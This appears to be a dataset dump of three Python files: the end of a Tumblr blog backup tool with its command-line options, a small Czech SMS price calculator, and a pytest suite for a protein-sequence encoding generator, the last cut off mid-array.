lines[0]:\n del lines[0]\n while lines and '</article' not in lines[-1]:\n del lines[-1]\n post = '\\n'.join(lines)\n if in_tag_index:\n # fixup all media links which now have to be two folders lower\n shallow_media = urlpathjoin('..', media_dir)\n deep_media = urlpathjoin(save_dir, media_dir)\n post = post.replace(shallow_media, deep_media)\n return post\n\n\nclass ThreadPool(object):\n def __init__(self, thread_count=20, max_queue=1000):\n self.queue = LockedQueue(threading.RLock(), max_queue) # type: LockedQueue[Callable[[], None]]\n self.quit = threading.Event()\n self.abort = threading.Event()\n self.threads = [threading.Thread(target=self.handler) for _ in range(thread_count)]\n for t in self.threads:\n t.start()\n\n def add_work(self, *args, **kwargs):\n self.queue.put(*args, **kwargs)\n\n def wait(self):\n logger.status('{} remaining posts to save\\r'.format(self.queue.qsize()))\n 
self.quit.set()\n while True:\n with self.queue.all_tasks_done:\n if not self.queue.unfinished_tasks:\n break\n self.queue.all_tasks_done.wait(timeout=0.1)\n no_internet.check()\n\n def cancel(self):\n self.abort.set()\n no_internet.destroy()\n for i, t in enumerate(self.threads, start=1):\n logger.status('Stopping threads {}{}\\r'.format(' ' * i, '.' * (len(self.threads) - i)))\n t.join()\n\n with self.queue.mutex:\n self.queue.queue.clear()\n self.queue.all_tasks_done.notify_all()\n\n def handler(self):\n while not self.abort.is_set():\n with self.queue.mutex:\n try:\n work = self.queue.get(block=not self.quit.is_set(), timeout=0.1)\n except queue.Empty:\n if self.quit.is_set():\n break\n continue\n qsize = self.queue.qsize()\n\n if self.quit.is_set() and qsize % REM_POST_INC == 0:\n logger.status('{} remaining posts to save\\r'.format(qsize))\n\n try:\n work()\n finally:\n self.queue.task_done()\n\n\nif __name__ == '__main__':\n # The default of 'fork' can cause deadlocks, even on Linux\n # See https://bugs.python.org/issue40399\n if not PY3:\n pass # No set_start_method. Here be dragons\n elif 'forkserver' in multiprocessing.get_all_start_methods():\n multiprocessing.set_start_method('forkserver') # Fastest safe option, if supported\n else:\n multiprocessing.set_start_method('spawn') # Slow but safe\n\n no_internet.setup()\n\n import argparse\n\n class CSVCallback(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, set(values.split(',')))\n\n class CSVListCallback(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, list(values.split(',')))\n\n class RequestCallback(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n request = getattr(namespace, self.dest) or {}\n for req in values.lower().split(','):\n parts = req.strip().split(':')\n typ = parts.pop(0)\n if typ != TYPE_ANY and typ not in POST_TYPES:\n parser.error(\"{}: invalid post type '{}'\".format(option_string, typ))\n for typ in POST_TYPES if typ == TYPE_ANY else (typ,):\n if parts:\n request[typ] = request.get(typ, set()).union(parts)\n else:\n request[typ] = {TAG_ANY}\n setattr(namespace, self.dest, request)\n\n class TagsCallback(RequestCallback):\n def __call__(self, parser, namespace, values, option_string=None):\n super(TagsCallback, self).__call__(\n parser, namespace, TYPE_ANY + ':' + values.replace(',', ':'), option_string,\n )\n\n parser = argparse.ArgumentParser(usage='%(prog)s [options] blog-name ...',\n description='Makes a local backup of Tumblr blogs.')\n parser.add_argument('-O', '--outdir', help='set the output directory (default: blog-name)')\n parser.add_argument('-D', '--dirs', action='store_true', help='save each post in its own folder')\n parser.add_argument('-q', '--quiet', action='store_true', help='suppress progress messages')\n parser.add_argument('-i', '--incremental', action='store_true', help='incremental backup mode')\n parser.add_argument('-l', '--likes', action='store_true', help=\"save a blog's likes, not its posts\")\n parser.add_argument('-k', '--skip-images', action='store_false', dest='save_images',\n help='do not save images; link to Tumblr instead')\n parser.add_argument('--save-video', action='store_true', help='save all video files')\n parser.add_argument('--save-video-tumblr', action='store_true', help='save only Tumblr video files')\n parser.add_argument('--save-audio', action='store_true', help='save audio files')\n 
parser.add_argument('--save-notes', action='store_true', help='save a list of notes for each post')\n parser.add_argument('--copy-notes', action='store_true', help='copy the notes list from a previous archive')\n parser.add_argument('--notes-limit', type=int, metavar='COUNT', help='limit requested notes to COUNT, per-post')\n parser.add_argument('--cookiefile', help='cookie file for youtube-dl, --save-notes, and svc API')\n parser.add_argument('-j', '--json', action='store_true', help='save the original JSON source')\n parser.add_argument('-b', '--blosxom', action='store_true', help='save the posts in blosxom format')\n parser.add_argument('-r', '--reverse-month', action='store_false',\n help='reverse the post order in the monthly archives')\n parser.add_argument('-R', '--reverse-index', action='store_false', help='reverse the index file order')\n parser.add_argument('--tag-index', action='store_true', help='also create an archive per tag')\n parser.add_argument('-a', '--auto', type=int, metavar='HOUR',\n help='do a full backup at HOUR hours, otherwise do an incremental backup'\n ' (useful for cron jobs)')\n parser.add_argument('-n', '--count', type=int, help='save only COUNT posts')\n parser.add_argument('-s', '--skip', type=int, default=0, help='skip the first SKIP posts')\n parser.add_argument('-p', '--period', help=\"limit the backup to PERIOD ('y', 'm', 'd' or YYYY[MM[DD]])\")\n parser.add_argument('-N', '--posts-per-page', type=int, default=50, metavar='COUNT',\n help='set the number of posts per monthly page, 0 for unlimited')\n parser.add_argument('-Q', '--request', action=RequestCallback,\n help=u'save posts matching the request TYPE:TAG:TAG:…,TYPE:TAG:…,…. '\n u'TYPE can be {} or {any}; TAGs can be omitted or a colon-separated list. '\n u'Example: -Q {any}:personal,quote,photo:me:self'\n .format(u', '.join(POST_TYPES), any=TYPE_ANY))\n parser.add_argument('-t', '--tags', action=TagsCallback, dest='request',\n help='save only posts tagged TAGS (comma-separated values; case-insensitive)')\n parser.add_argument('-T', '--type', action=RequestCallback, dest='request',\n help='save only posts of type TYPE (comma-separated values from {})'\n .format(', '.join(POST_TYPES)))\n parser.add_argument('-F', '--filter', help='save posts matching a jq filter (needs jq module)')\n parser.add_argument('--no-reblog', action='store_true', help=\"don't save reblogged posts\")\n parser.add_argument('-I', '--image-names', choices=('o', 'i', 'bi'), default='o', metavar='FMT',\n help=\"image filename format ('o'=original, 'i'=<post-id>, 'bi'=<blog-name>_<post-id>)\")\n parser.add_argument('-e', '--exif', action=CSVCallback, default=set(), metavar='KW',\n help='add EXIF keyword tags to each picture'\n \" (comma-separated values; '-' to remove all tags, '' to add no extra tags)\")\n parser.add_argument('-S', '--no-ssl-verify', action='store_true', help='ignore SSL verification errors')\n parser.add_argument('--prev-archives', action=CSVListCallback, default=[], metavar='DIRS',\n help='comma-separated list of directories (one per blog) containing previous blog archives')\n parser.add_argument('--no-post-clobber', action='store_true', help='Do not re-download existing posts')\n parser.add_argument('--no-server-timestamps', action='store_false', dest='use_server_timestamps',\n help=\"don't set local timestamps from HTTP headers\")\n parser.add_argument('--hostdirs', action='store_true', help='Generate host-prefixed directories for media')\n parser.add_argument('--user-agent', help='User agent string to use with HTTP requests')\n 
parser.add_argument('blogs', nargs='*')\n options = parser.parse_args()\n\n if options.auto is not None and options.auto != time.localtime().tm_hour:\n options.incremental = True\n if options.period:\n try:\n pformat = {'y': '%Y', 'm': '%Y%m', 'd': '%Y%m%d'}[options.period]\n options.period = time.strftime(pformat)\n except KeyError:\n options.period = options.period.replace('-', '')\n if not re.match(r'^\\d{4}(\\d\\d)?(\\d\\d)?$', options.period):\n parser.error(\"Period must be 'y', 'm', 'd' or YYYY[MM[DD]]\")\n set_period()\n\n wget_retrieve = WgetRetrieveWrapper(options, logger.log)\n setup_wget(not options.no_ssl_verify, options.user_agent)\n\n blogs = options.blogs or DEFAULT_BLOGS\n if not blogs:\n parser.error(\"Missing blog-name\")\n if options.count is not None and options.count < 0:\n parser.error('--count: count must not be negative')\n if options.count == 0 and (options.incremental or options.auto is not None):\n parser.error('--count 0 conflicts with --incremental and --auto')\n if options.skip < 0:\n parser.error('--skip: skip must not be negative')\n if options.posts_per_page < 0:\n parser.error('--posts-per-page: posts per page must not be negative')\n if options.outdir and len(blogs) > 1:\n parser.error(\"-O can only be used for a single blog-name\")\n if options.dirs and options.tag_index:\n parser.error(\"-D cannot be used with --tag-index\")\n if options.exif:\n if pyexiv2 is None:\n parser.error(\"--exif: module 'pyexiv2' is not installed\")\n if not hasattr(pyexiv2, 'ImageMetadata'):\n parser.error(\"--exif: module 'pyexiv2' is missing features, perhaps you need 'py3exiv2'?\")\n if options.save_video and not youtube_dl:\n parser.error(\"--save-video: module 'youtube_dl' is not installed\")\n if options.cookiefile is not None and not os.access(options.cookiefile, os.R_OK):\n parser.error('--cookiefile: file cannot be read')\n if options.save_notes:\n if BeautifulSoup is None:\n parser.error(\"--save-notes: module 'bs4' is not installed\")\n import note_scraper\n if options.copy_notes:\n if not options.prev_archives:\n parser.error('--copy-notes requires --prev-archives')\n if BeautifulSoup is None:\n parser.error(\"--copy-notes: module 'bs4' is not installed\")\n if options.notes_limit is not None:\n if not options.save_notes:\n parser.error('--notes-limit requires --save-notes')\n if options.notes_limit < 1:\n parser.error('--notes-limit: Value must be at least 1')\n if options.filter is not None:\n if jq is None:\n parser.error(\"--filter: module 'jq' is not installed\")\n options.filter = jq.compile(options.filter)\n if options.prev_archives:\n if scandir is None:\n parser.error(\"--prev-archives: Python is less than 3.5 and module 'scandir' is not installed\")\n if len(options.prev_archives) != len(blogs):\n parser.error('--prev-archives: expected {} directories, got {}'.format(\n len(blogs), len(options.prev_archives),\n ))\n for blog, pa in zip(blogs, options.prev_archives):\n if not os.access(pa, os.R_OK | os.X_OK):\n parser.error(\"--prev-archives: directory '{}' cannot be read\".format(pa))\n blogdir = os.curdir if options.blosxom else (options.outdir or blog)\n if os.path.realpath(pa) == os.path.realpath(blogdir):\n parser.error(\"--prev-archives: Directory '{}' is also being written to. 
Use --reuse-json instead if \"\n \"you want this, or specify --outdir if you don't.\".format(pa))\n\n if not API_KEY:\n sys.stderr.write('''\\\nMissing API_KEY; please get your own API key at\nhttps://www.tumblr.com/oauth/apps\\n''')\n sys.exit(1)\n\n ApiParser.setup()\n tb = TumblrBackup()\n try:\n for i, account in enumerate(blogs):\n logger.backup_account = account\n tb.backup(account, options.prev_archives[i] if options.prev_archives else None)\n except KeyboardInterrupt:\n sys.exit(EXIT_INTERRUPT)\n\n if tb.failed_blogs:\n logger.warn('Failed to back up {}'.format(', '.join(tb.failed_blogs)))\n sys.exit(tb.exit_code())\n","repo_name":"katekate1988/tumblr-utils","sub_path":"tumblr_backup.py","file_name":"tumblr_backup.py","file_ext":"py","file_size_in_byte":73564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"4673308293","text":"def cislo(tel_cislo):\n if len(tel_cislo) == 13 and tel_cislo[0:4] == '+420' or len(tel_cislo) == 9:\n tel_cislo = True\n return tel_cislo\n else:\n tel_cislo = False\n print('Zadal jsi špatné číslo.')\n return tel_cislo\n\nzadane_cislo=input('Zadej číslo: ').replace(\" \",\"\")\novereni_cisla = cislo(zadane_cislo)\n\nif overeni_cisla:\n def text(text_zpravy):\n cena_sms = ((len(text_zpravy) // 180) + 1) * 3\n return cena_sms\n zadana_zprava = input('Zadej znění zprávy: ')\n cena = text(zadana_zprava)\n print(f'Cena SMS je {cena} Kč. ')","repo_name":"adelakrejbychova/python-2022","sub_path":"sms_brana.py","file_name":"sms_brana.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13426285941","text":"\"\"\"\nThis file contains functions that test the functionality of MLDE/Support/Encode/EncodingGenerator.py\n\"\"\"\n# Import necessary modules\nimport pytest\nimport time\nimport os\nimport shutil\nimport pickle\nimport subprocess\nimport numpy as np\nfrom itertools import product\nfrom Bio import SeqIO\n\n# Import the encoding generator\nfrom Support.Encode.EncodingGenerator import EncodingGenerator\nfrom Support.Encode.MolBioInfo import all_aas\nfrom Support.Encode.TapeModelLocations import tape_model_locations\nfrom Support.Encode.GeorgievParams import georgiev_parameters\n\n# Define the location of the test output folder\ntest_output_folder = \"./Validation/pytest/Encode/TestOutput\"\n\n# Define allowed learned encodings\nallowed_all = (\"onehot\", \"georgiev\", \"resnet\", \"bepler\", \"unirep\", \"transformer\", \"lstm\")\nallowed_learned = (\"resnet\", \"bepler\", \"unirep\", \"transformer\", \"lstm\")\n\n# Write a function that compares encoder properties\ndef compare_encoder_properties(encoder1, encoder2):\n \n # Assert properties are the same where reasonable\n assert encoder1.n_positions_combined == encoder2.n_positions_combined\n assert encoder1.combi_space == encoder2.combi_space\n assert all(combo1 == combo2 for combo1, combo2 in\n zip(encoder1.all_combos, encoder2.all_combos))\n assert encoder1.index_to_combo == encoder2.index_to_combo\n\n# Define a function that tests _normalize_encodings()\ndef test_normalize_encodings():\n \"\"\"\n This function simply tests where things passed in to _normalize_encodings\n will be correctly normalized.\n \"\"\" \n # Import function to test\n from Support.Encode.EncodingGenerator import _normalize_encodings\n \n # We expect an error if the incorrect shape is passed in\n with pytest.raises(AssertionError):\n _normalize_encodings(np.random.rand(1000, 10))\n \n # Now define an input array and what we expect it to be coming out\n test_input = np.random.rand(1000, 7, 100)\n \n # Get the latter dimensions\n flat_test = np.empty([1000, 700])\n for i in range(1000):\n filler = []\n for row in test_input[i]:\n filler.extend(row)\n flat_test[i] = filler\n \n # Get means and standard deviations\n means = np.array([np.mean(flat_test[:, i]) for i in range(700)])\n stdevs = np.array([np.std(flat_test[:, i]) for i in range(700)])\n \n # Mean center and unit-scale\n center_scaled = np.array([(flat_test[:, i] - means[i])/stdevs[i]\n for i in range(700)]).T\n \n # Reshape\n test_output = np.array([[center_scaled[i][j: j+100] for j in range(0, 700, 100)]\n for i in range(1000)])\n \n # Assert all close\n assert np.allclose(test_output, _normalize_encodings(test_input))\n \n# This function checks the initialization stage of the EncodingGenerator\ndef test_EncodingGenerator_init():\n \"\"\"\n This function will...\n 1. Test to be sure we behave correctly under different circumstances: If learned\n encodings are used, then we should go through more checks (two other functions)\n than if georgiev or onehot are used. All should still achieve the same \n final variables, however; an incorrect encoding should be reported as an error\n 2. Make sure that learned encodings require target protein indices\n 3. Make sure that onehot and georgiev require n_positions_combined\n 4. 
Make sure an error is thrown if we have an unknown encoding\n \"\"\"\n\n # Make sure errors are thrown if we don't have the correct variables for each encoding\n with pytest.raises(AssertionError, match = \"Did not define n_positions_combined\"):\n _ = EncodingGenerator(\"georgiev\", \"test\",\n output = test_output_folder)\n with pytest.raises(AssertionError, match = \"Did not define n_positions_combined\"):\n _ = EncodingGenerator(\"onehot\", \"test\",\n output = test_output_folder)\n \n # Loop over all embeddings and make sure we throw an error if we did not pass\n # in the correct arguments\n for encoding in allowed_learned:\n with pytest.raises(AssertionError, match = \"Did not define target indices\"):\n _ = EncodingGenerator(encoding, \"test\",\n output = test_output_folder)\n \n # Make sure there is an error if we pass in an unknown encoding\n with pytest.raises(AssertionError, match = \"Unknown encoding\"):\n _ = EncodingGenerator(\"alkdjfhlaksdf\", \"test\",\n output = test_output_folder)\n \n # Define objects for the unlearned encodings\n georgiev_obj = EncodingGenerator(\"georgiev\", \"test\", n_positions_combined = 3,\n output = test_output_folder)\n time.sleep(1)\n onehot_obj = EncodingGenerator(\"onehot\", \"test\", n_positions_combined = 3,\n output = test_output_folder)\n compare_encoder_properties(georgiev_obj, onehot_obj)\n \n # Make sure the variables are the size we expect\n assert georgiev_obj.n_positions_combined == 3\n assert georgiev_obj.combi_space == 8000\n \n # Define objects for the learned encodings and make sure we arrive at the \n # same variables as with georgiev and onehot encodings\n for encoding in allowed_learned:\n \n # Make the learned embedding object\n time.sleep(1)\n learned_obj = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n \n # Make sure the embedding object has the same variables as the georgiev one\n compare_encoder_properties(learned_obj, georgiev_obj)\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function that tests _process_input_fasta\ndef test_process_input_fasta():\n \"\"\"\n This function only applies for learned embeddings. The test will...\n 1. Make sure all assertion errors in the process function are raised when\n appropriate\n 2. 
Confirm that we get back the expected protein sequence\n \"\"\"\n # Loop over all allowed embeddings\n for encoding in allowed_learned:\n \n # Make sure that we have an error if we can't find a file\n with pytest.raises(IOError, match = \"Cannot locate './Validation/pytest/Encode/TestData/Dud.fasta'\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/Dud.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n time.sleep(1)\n \n # Make sure we have an error if the fasta file has two sequences\n with pytest.raises(AssertionError, match = \"Embedding generator can currently only handle 1 parent sequence\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta2Seqs.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n time.sleep(1)\n \n # Make sure we have an error if we have forbidden characters\n with pytest.raises(AssertionError, match = \"Forbidden character in input sequence.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFastaForbiddenCharacters.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n time.sleep(1)\n \n # Make sure the output sequence is correct\n embedding_obj = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n assert embedding_obj.wt_seq == \"VAFYQSTGHLMNDDDAAGGLIMNPPQDE\"\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function that tests _check_indices()\ndef test_check_indices():\n \"\"\"\n This function checks the below:\n 1. The index_splitter correctly splits amino acid positions and letters\n 2. The index_splitter throws an error if the input format is wrong\n 3. The correct python indices are generated from the input protein indices\n 4. If amino acid names don't match up, we throw an error\n 5. The correct wild type amino acids are pulled\n 6. Throw an error if indices are not pased in in order\n 7. 
Throw an error if duplicate indices are passed in\n \"\"\"\n # Define the target indices and expected outputs\n expected_aas = (\"Q\", \"L\", \"G\")\n expected_python_inds = (4, 9, 18)\n expected_protein_inds = (\"Q5\", \"L10\", \"G19\")\n \n # Make some bad inputs\n bad_in1 = (\"5Q\", \"10L\", \"19G\")\n bad_in2 = (\"Q5\", \"10L\", \"19G\")\n bad_in3 = (\"Q_5\", \"L_10\", \"G_19\")\n \n bad_in4 = (\"A5\", \"L10\", \"G19\")\n bad_in5 = (\"Q5\", \"D10\", \"G19\")\n bad_in6 = (\"Q5\", \"L10\", \"Z19\")\n bad_in7 = (\"A5\", \"D10\", \"E19\")\n \n bad_in8 = (\"L10\", \"Q5\", \"G19\")\n bad_in9 = (\"G19\", \"L10\", \"Q5\")\n \n bad_in10 = (\"Q5\", \"Q5\", \"G19\")\n bad_in11 = (\"Q5\", \"Q5\", \"Q5\")\n \n # Loop over all embeddings\n for encoding in allowed_learned: \n \n # Build an Embedding object\n embedding_obj = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = expected_protein_inds)\n time.sleep(1)\n \n # Make sure we correctly split amino acids\n assert all((aa == expected_aas[i] and ind == expected_python_inds[i] and pind == expected_protein_inds[i])\n for i, (aa, ind, pind) in enumerate(zip(embedding_obj.wt_aas, embedding_obj.target_python_inds,\n embedding_obj.target_protein_indices)))\n \n # Make sure we throw an error if the input format is wrong\n for bad_in in (bad_in1, bad_in2, bad_in3):\n with pytest.raises(AssertionError, match = \"Unrecognizable protein index.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Make sure an error is thrown if the amino acid identities don't match\n # with the expected\n for bad_in in (bad_in4, bad_in5, bad_in6, bad_in7):\n with pytest.raises(AssertionError, match = \"Requested positions not found.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Now make sure we throw an error if amino acid indices aren't passed in\n # in order\n for bad_in in (bad_in8, bad_in9):\n with pytest.raises(AssertionError, match = \"Out of order indices.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Now make sure we throw an error if there are duplicates indices found\n for bad_in in (bad_in10, bad_in11):\n with pytest.raises(AssertionError, match = \"Duplicate indices identified.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function that tests build_combo_dicts\ndef test_build_combo_dicts():\n \"\"\"\n This function makes sure that the combo_to_index and index_to_combo dictionaries\n generated and saved during initialization are accurate\n \"\"\"\n # Make sure all_aas is the right length\n assert len(set(all_aas)) == 20\n \n # Design a set of all possible combinations for 2, 3 and 4 site libraries\n lib_sizes = (2, 3, 4)\n expected_lengths = (400, 8000, 160000)\n \n # Loop over possible library sizes\n for lib_ind, lib_size in enumerate(lib_sizes):\n \n # Generate a test library\n test_lib = list(product(all_aas, 
repeat=lib_size))\n \n # Loop over all encodings\n for encoding in allowed_all:\n \n # Make the encoder\n encoder = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = (\"A2\", \"Q5\", \"L10\", \"G19\")[:lib_size],\n n_positions_combined = lib_size)\n time.sleep(1)\n \n # Load the index to combo and combo to index dictionaries\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_ComboToIndex.pkl\"), \"rb\") as f:\n combo_to_ind = pickle.load(f)\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_IndexToCombo.pkl\"), \"rb\") as f:\n ind_to_combo = pickle.load(f)\n \n # Make sure the dictionaries are in agreement\n assert all(ind_to_combo[val] == key for key, val in combo_to_ind.items())\n \n # Make sure the lengths of everything is as expected\n assert len(test_lib) == expected_lengths[lib_ind]\n assert len(test_lib) == len(ind_to_combo)\n assert len(test_lib) == len(combo_to_ind)\n assert len(test_lib) == len(encoder.all_combos)\n \n # Make sure our test library and the all_combos libraries align\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(test_lib))\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(encoder.all_combos))\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function to be sure we are correctly making fastas\ndef test_make_fastas():\n \"\"\"\n This function tests...\n 1. To be sure that the correct mutations are made in the correct locations\n of the wild type sequence for fasta files of different library sizes\n 2. To be sure that batching is being performed appropriately and we are not\n either cutting out sequences or adding sequences\n 3. 
To be sure that the combo_to_index and index_to_combo dictionaries\n generated and saved during initialization are accurate\n \"\"\"\n # Design a set of all possible combinations for 2, 3 and 4 site libraries\n lib_sizes = (2, 3, 4)\n expected_lengths = (400, 8000, 160000)\n \n # Defie a number of different batch sizes (making them awkard on purpose)\n batch_sizes = (1, 3, 4, 5, 7, 10, 13, 59)\n \n # Define the positions to mutate\n mutated_positions = (\"A2\", \"Q5\", \"L10\", \"G19\")\n expected_mut_inds = (1, 4, 9, 18)\n \n # Loop over possible library sizes\n for lib_ind, lib_size in enumerate(lib_sizes):\n \n # Generate a test library\n test_lib = list(product(all_aas, repeat=lib_size))\n \n # Loop over all encodings\n for encoding in allowed_all:\n \n # Loop over batch sizes\n for batch_size in batch_sizes:\n \n # Make the encoder\n encoder = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = mutated_positions[:lib_size],\n n_positions_combined=lib_size)\n time.sleep(1)\n \n # Load the index to combo and combo to index dictionaries\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_ComboToIndex.pkl\"), \"rb\") as f:\n combo_to_ind = pickle.load(f)\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_IndexToCombo.pkl\"), \"rb\") as f:\n ind_to_combo = pickle.load(f)\n \n # Make sure the dictionaries are in agreement\n assert all(ind_to_combo[val] == key for key, val in combo_to_ind.items())\n \n # Make sure the lengths of everything is as expected\n assert len(set(test_lib)) == expected_lengths[lib_ind]\n assert len(test_lib) == len(ind_to_combo)\n assert len(test_lib) == len(combo_to_ind)\n assert set(test_lib) == set(encoder.all_combos)\n \n # Make sure our test library and the all_combos libraries align\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(test_lib))\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(encoder.all_combos))\n \n # If this is a georgiev or onehot encoding, continue from here\n if encoding in {\"onehot\", \"georgiev\"}:\n continue\n \n # Make fastas\n fasta_files = encoder._build_fastas(batch_size)\n \n # Now load all fasta files\n mutated_seqs = []\n for fasta_file in fasta_files:\n \n # Load the fasta file\n with open(fasta_file, \"r\") as f:\n \n # Open the fasta file and extract all sequences\n fasta_seqs = list(SeqIO.parse(f, \"fasta\"))\n \n # Convert the full sequence to uppercase and record\n mutated_seqs.extend([str(seq.seq) for seq in fasta_seqs])\n \n # Make sure the length is as expected\n assert len(mutated_seqs) == expected_lengths[lib_ind]\n \n # Loop over the sequences and make sure the amino acids match\n # the combinations\n for seqid, seq in enumerate(mutated_seqs):\n \n # Pull the amino acids at the correct sequence positions\n mutated_aas = [seq[ind] for ind in expected_mut_inds[:lib_size]]\n \n # Make sure the mutated_aas match the combination expected\n assert all(mutant_aa == expected_aa for mutant_aa, expected_aa\n in zip(encoder.all_combos[seqid], mutated_aas))\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n \n# Test the generate_encodings function\ndef test_generate_encodings():\n \"\"\"\n This is a beefy test function. Using it, we test the functions:\n 1. _generate_onehot()\n 2. _generate_georgiev()\n 3. 
_generate_learned()\n \n This function is tested last because it relies on all of the preceding functions\n working. For each of the above encoding functions, we test whether the encodings \n we get from a subset of all encodings align with what we would have arrived\n at performing encoding manually (or as close to it as we can for the learned\n embeddings)? This relies pulling the expected index of the encoding using \n the appropriate dictionaries. We also test to be sure there are no duplicate\n encodings in the returned arrays. All of these tests are performed over multiple\n batch sizes, but only for libraries of size 2 and 3 (For the sake of compute time) \n \"\"\"\n # Design a set of all possible combinations for 2 and 3 site libraries\n lib_sizes = (2, 3)\n expected_lengths = (400, 8000)\n \n # Defie a number of different batch sizes (making them awkard on purpose)\n batch_sizes = (1, 3, 4, 13, 59)\n \n # Define the expected shapes\n expected_shapes = {\"onehot\": 20,\n \"georgiev\": 19,\n \"resnet\": 256,\n \"bepler\": 100,\n \"unirep\": 1900,\n \"transformer\": 512,\n \"lstm\": 2048}\n \n # Define the positions to mutate\n mutated_positions = (\"A2\", \"Q5\", \"G19\")\n expected_mut_inds = (1, 4, 18)\n \n # Define the variants that we will test\n tested_vars = (\"ADQ\", \"GHI\", \"WYD\", \"IFK\", \"PRS\")\n \n # Define the expected onehot encodings\n expected_onehot = np.array([\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\n ],\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 